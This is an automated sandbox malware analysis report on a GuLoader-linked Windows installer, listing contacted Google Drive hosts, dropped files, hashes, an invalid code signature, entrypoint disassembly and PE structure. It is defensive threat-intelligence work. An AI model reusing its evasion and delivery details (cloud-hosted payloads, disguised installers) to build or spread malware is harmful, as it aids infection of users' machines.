                                            http://www.quovadis.bm0nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845952675.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845828650.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://apis.google.comnRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.google.com/(nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ocsp.quovadisoffshore.com0nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845952675.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845828650.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/enRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.google.com/anRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.190.110
                                                        		drive.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        142.250.190.97
                                                        		drive.usercontent.google.comUnited States
                                                        		15169GOOGLEUSfalse

                                                        General Information

                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1587595
                                                        Start date and time:2025-01-10 15:28:21 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 14m 8s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                        Run name:Suspected Instruction Hammering
                                                        Number of analysed new started processes analysed:5
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:nRNzqQOQwk.exe
                                                        Detection:MAL
                                                        Classification:mal72.troj.evad.winEXE@3/7@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 77%
                                                        • Number of executed functions: 40
                                                        • Number of non-executed functions: 30
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): WerFault.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        No context

                                                        ASNs

                                                        No context

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        FIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        n41dQbiw1Y.exeGet hashmaliciousBabuk, DjvuBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110
                                                        stage3.exeGet hashmaliciousCobaltStrikeBrowse
                                                        • 142.250.190.97
                                                        • 142.250.190.110

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dllODjwCjQBAP.exeGet hashmaliciousGuLoaderBrowse
                                                          ODjwCjQBAP.exeGet hashmaliciousGuLoaderBrowse
                                                            Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                          Created / dropped Files

                                                                          C:\Program Files (x86)\Fljtenists.ini

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):34
                                                                          Entropy (8bit):4.35937791471612
                                                                          Encrypted:false
                                                                          SSDEEP:3:oMXADiGWkon:xnGWn
                                                                          MD5:5BAD417385FA63549574090876DC680D
                                                                          SHA1:84E00066DC079E657BE9AF39E2C9E4EC42F5E527
                                                                          SHA-256:8B8CCA2780BD72F608E87BAEC979BBB17706AEFEB8D9F603E53AE144ECFAB71D
                                                                          SHA-512:EA709BAB31CFAAB4979617C4D1DFF414387F6988BE9F67E70BF7F941A9E7EA4C36CF320CE2518AE0DD9171DF5C46BE85D86D3F6031059A3CB3E79FD58E3F14E2
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:[Omniregent]..promovable=bugspyt..

                                                                          C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):11264
                                                                          Entropy (8bit):5.7711167426271945
                                                                          Encrypted:false
                                                                          SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                          MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                          SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                          SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                          SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: ODjwCjQBAP.exe, Detection: malicious, Browse
                                                                          • Filename: ODjwCjQBAP.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                          • Filename: 5112024976.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\slavelivets\Frimenigheders.Lin

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):457262
                                                                          Entropy (8bit):2.660957868808711
                                                                          Encrypted:false
                                                                          SSDEEP:3072:D/3hlxuinGt/VhqT1iOn8lRgQ69dV1Vbx:7oig/VYRJz9Xt
                                                                          MD5:CDE198D8ADD807141052775916060A46
                                                                          SHA1:BA64728F6A13AEE536B9EF46484A7938F52D9272
                                                                          SHA-256:C9BBC92FD69037DCCF745A1ECC71F4BCE8867E41CD9D2DCDB8332587A1A147B6
                                                                          SHA-512:898011AB3D1BAA68E702091C465F2BB1EBD172475CE73439A9BB8B205E68ABAFAE71776445BC7DC87227F9E0E80A04272944962C95CAE415786C252DEE256041
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:00E100005252525200000000000000F00031313100AE0000005600FF00000000000000EAEAEAEAEAEA006300000000004E0056565656565656000000F2F2F2F200E6E6E60000DDDD00828200000000C600E5E50000DEDE0013131300AC00000000A9A900004900000000242424001313130038001F000075757575757500BE00004B4B4B0000080800004200005F00000000EFEF00F300006A005E004141000010101010004F4F0000CA0056560000272727005800290000000000000000000A00002A000065650085000000550000000000D0D0001B00008686005B00CA00000000003C3C00BA005700009C9C00898900008383005400CACACA0000AC00F100DDDD00E200FB0000007700110000000086860000000000000000ADADAD001A1A00D8D80000353535009A9A000000878700F8004141000000D0D0D000000000D900292929290000FBFB0006060600D00000535300F1F10000B000A6A6A600006C6C6C6C0029290000000000ADAD00B7B70000C300000000A2000000626262005E0000000000AAAAAA0000000042000000AAAA00002C002600D4D4000000101000002D005700200000ADAD0000030000D4D400000000001E1E1E1E1E00002F2F2F2F2F2F00D3004646002F000000F5F5F5F5F500B3B3B3B300006600161616160000282828280000DBDBDBDBDBDB00BB0000D70081

                                                                          C:\Users\user\slavelivets\Tonsillary252.Ban

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):193843
                                                                          Entropy (8bit):7.55628710093093
                                                                          Encrypted:false
                                                                          SSDEEP:3072:H39dlMnmxBSEy9gi65aaTlHepUWtyW8ImC/BN2WlIP7AKAKUHjjuXKc:X5SHWhTlHwhXNPTH2bUDjuac
                                                                          MD5:FFAC979D13A99BF107CED6B9BBA2B7E4
                                                                          SHA1:04E8B535A2B67D6CBAA54626492583D0DF1C9435
                                                                          SHA-256:482E699C60E1B448B9953352AB2840956AB56E9C5559B5C06CF4F48D5AF98781
                                                                          SHA-512:7DA199810F2A6B76FDA110D419EA35A424A0155DB814AA081F84F1C7CB0B9072E64D8B1A89F606D557A8B54AF8AC6395200F1CF281C28BC06101916C5285FFF3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......nnn.....aaaa....4..............R.P.......]]].......s.........)).............VV.........SS.........................................;.../..55...........z.....&.............$.3...&.....JJ..).......%.......................................a...........7.........#####...........}}}......................ss.....\\\...................................................TT..p......j..........?...++............bb.....................A..........z...............K.....................:::........cc........).............e.........M............)))..........]..&&&.GGGGGG..%......III.....................hh.....l..........y............./......X....Z..j................88.........................c..........9............................#........aaaa...................z...... ..........w....#.v.................K.................jjjjj.....99......................vv........--........Y.......6.........................................L..........uu....................r..................K................W.d......

                                                                          C:\Users\user\slavelivets\alsmekill.sta

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):339393
                                                                          Entropy (8bit):1.2543469977620876
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JwpZQcXbJ+mf8ME8s+dg5Z90uGaXF9Pl7:W4cX8ncmxhGm
                                                                          MD5:F6A8488B1B62B7AC3B0979C8FBEABB30
                                                                          SHA1:9725896EBC26CCB2CB9060640B9E0D4A0618916F
                                                                          SHA-256:34DC9B70D0CE5223A531E499611F1208F3AE85AAEF9973FC27E89190568F8EE2
                                                                          SHA-512:88A719685D0972290632C6B5A665184E79A98BE22B76AF28F18056F2E7A721A0B2D3B4A8815BCE562426643E69F998F9E45F3CA62B3288EAAFB71FE89A23AD20
                                                                          Malicious:false
                                                                          Preview:..............................................o....D....................l.......k...................................._...2...........;..........................................0............................e......_....................}.......................,....4...................n.............T................j...z..........u.....#...................h............].............................................................................................................1......G...h.......g...3..(........................................................H......)...........o...................4.............^..................."....................$....................E..............................................................|..........3.............1...........................S....................x..........................................................................................................................................................=..........................|....

                                                                          C:\Users\user\slavelivets\boat.ast

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):456047
                                                                          Entropy (8bit):1.2479728238915362
                                                                          Encrypted:false
                                                                          SSDEEP:768:WqBSYr/TzktUI9ql+6iD8iDu43pfrmQ+PHlyjwkZY51UG90JdfSDUsby4/FApmbO:I3TS9ymKhysrQEkRbwvL3xcbNyFN2Mv
                                                                          MD5:9911B32FE219697A738F39AE5766B512
                                                                          SHA1:DA67EBB043C778DEEA874E1C746483A2B65E533C
                                                                          SHA-256:1D3D52ECB41F725DC23080ACB1ACDFEDF29BB5F167DCB75F89AF837888421880
                                                                          SHA-512:FBF703CD56434BB14C6A1A34878F094BE183D9F638D0F34074F7EE4C9D12DB70A833679B496FCB1E4C6050C418A906221149AAC70035BCDA3C01D4272C0FE3E8
                                                                          Malicious:false
                                                                          Preview:.................................................z.................m.......L.......<.............................................................._.....y....._.........x.................................................................>............Q...........:e........................................................[.-.:....................................................A.....................................................................G................................+..............................z..........................................]...........................................................................................T.....&.}........G..............c...u.....................5......B....................................................................l................H..........................H.......................|...........................m.............................................:...........(...............8..............................................g.....

                                                                          C:\Users\user\slavelivets\rupis.txt

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):276
                                                                          Entropy (8bit):4.348758704403097
                                                                          Encrypted:false
                                                                          SSDEEP:6:4s/IdpH+oqGSUkJOlUjvMzJ7HxXEp6JN+qIN2CGZgw9n7FmNIb+:4skpesSUAOlSsJ7BEpg+H2XWwTmCq
                                                                          MD5:668A01D3AF55A42FBFDBB1E9DD730B59
                                                                          SHA1:E0949D489A15516B3CD09F1043543C38E3688F1A
                                                                          SHA-256:6A7FEEBFE1F4330E611E6E1B3804619D329A9D3ABD3A3ECBD9D441F884E9999D
                                                                          SHA-512:CF3F03583667362ADCEA4DEB094513B84D3E275EBCC42A993F9293B7374618A1BA060D4C4BAE446C02B329DDE2A4579C152F54A1F7537A0F83A3E88406509459
                                                                          Malicious:false
                                                                          Preview:vulcanizable zoanthidae raalam osullivan,phantasmic oxyluminescence fluidness pickin raadelig.muslimer broder encyclopaedically bessarabian bvt.skyggespillene shellfishes urmi fume panocha imago,troskabseder cypriotes thalassian,udvandringskontorers telfonmontrens bugtalende.

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.306164693512133
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:nRNzqQOQwk.exe
                                                                          File size:616'800 bytes
                                                                          MD5:c616c105a117d63de2b4f818c8fdd3e0
                                                                          SHA1:fe7d7c8863a5f71e02b2b5b76e1a8f506b08dba7
                                                                          SHA256:a180642558a07876a9a047217ef75504a4fe7e1f02e22e1f19ffba8d33e6790a
                                                                          SHA512:71499f14196cfc6b3c2dd9d767ef3174083ff384fa642cb46086fdba4cfa5bb13d13f0f7491f1e3da55eab19c5b431f667c0851466241258840dcbd308b9fc1c
                                                                          SSDEEP:6144:GyI5s2239X0wH5ky98puy+AMRYEBx2fKIn4jmTYzCr/5/dwgEhWSdfoVLg6XLCLl:D22tHb8MRYEBxAnPTYzA/7wRhW906OLl
                                                                          TLSH:A0D4F183340558E0F4E20DB154BB8A6105BF9F7ABB95282FB3DC731614F225A4B3A7D6
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....

                                                                          File Icon

                                                                          Icon Hash:8b1985c04404416d

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x403180
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                          Authenticode Signature

                                                                          Signature Valid:false
                                                                          Signature Issuer:CN="Congratulator Penetralia ", E=ida@Harpuneren9.Af, L=Wormsdorf, S=Sachsen-Anhalt, C=DE
                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                          Error Number:-2146762487
                                                                          Not Before, Not After
                                                                          • 24/06/2024 05:12:24 24/06/2027 05:12:24
                                                                          Subject Chain
                                                                          • CN="Congratulator Penetralia ", E=ida@Harpuneren9.Af, L=Wormsdorf, S=Sachsen-Anhalt, C=DE
                                                                          Version:3
                                                                          Thumbprint MD5:5F1213D251D7C1248101800D2397AEFA
                                                                          Thumbprint SHA-1:A24C9A43698A21F20F2503099FDB0E547144AFA5
                                                                          Thumbprint SHA-256:46FA314984A20ACD8945B5BC70EC2590BB3B9E7A27C8EA9AE030A1512F819942
                                                                          Serial:79B8813DC1624EA9849722EC81B484F6FED3A8A4

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 00000184h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+18h], ebx
                                                                          mov dword ptr [esp+10h], 00409198h
                                                                          mov dword ptr [esp+20h], ebx
                                                                          mov byte ptr [esp+14h], 00000020h
                                                                          call dword ptr [004070A8h]
                                                                          call dword ptr [004070A4h]
                                                                          cmp ax, 00000006h
                                                                          je 00007FD4D08FF153h
                                                                          push ebx
                                                                          call 00007FD4D09020C1h
                                                                          cmp eax, ebx
                                                                          je 00007FD4D08FF149h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 00407298h
                                                                          push esi
                                                                          call 00007FD4D090203Dh
                                                                          push esi
                                                                          call dword ptr [004070A0h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], bl
                                                                          jne 00007FD4D08FF12Dh
                                                                          push ebp
                                                                          push 00000009h
                                                                          call 00007FD4D0902094h
                                                                          push 00000007h
                                                                          call 00007FD4D090208Dh
                                                                          mov dword ptr [007A1F44h], eax
                                                                          call dword ptr [00407044h]
                                                                          push ebx
                                                                          call dword ptr [00407288h]
                                                                          mov dword ptr [007A1FF8h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+38h]
                                                                          push 00000160h
                                                                          push eax
                                                                          push ebx
                                                                          push 0079D500h
                                                                          call dword ptr [00407174h]
                                                                          push 00409188h
                                                                          push 007A1740h
                                                                          call 00007FD4D0901CB7h
                                                                          call dword ptr [0040709Ch]
                                                                          mov ebp, 007A8000h
                                                                          push eax
                                                                          push ebp
                                                                          call 00007FD4D0901CA5h
                                                                          push ebx
                                                                          call dword ptr [00407154h]

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c30000x28340.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x956100x1350.data
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x5e4a0x600030c42419b2e69d0fb178ad82fde5a6a6False0.6707356770833334data6.461674766148295IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x90000x3990380x400295703f29cbf0cc87537f54786ed1d01unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x3a30000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x3c30000x283400x284000a923a42d1a39b5e7ff4cbf67045065cFalse0.21775524068322982data4.016272150271427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x3c33580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.1348337868212469
                                                                          RT_ICON0x3d3b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.24942190456169855
                                                                          RT_ICON0x3dd0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.286090573012939
                                                                          RT_ICON0x3e24b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.2502952290977799
                                                                          RT_ICON0x3e66d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3522821576763486
                                                                          RT_ICON0x3e8c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.37828330206378985
                                                                          RT_ICON0x3e9d280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4668032786885246
                                                                          RT_ICON0x3ea6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5106382978723404
                                                                          RT_DIALOG0x3eab180x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x3eac180x11cdataEnglishUnited States0.6056338028169014
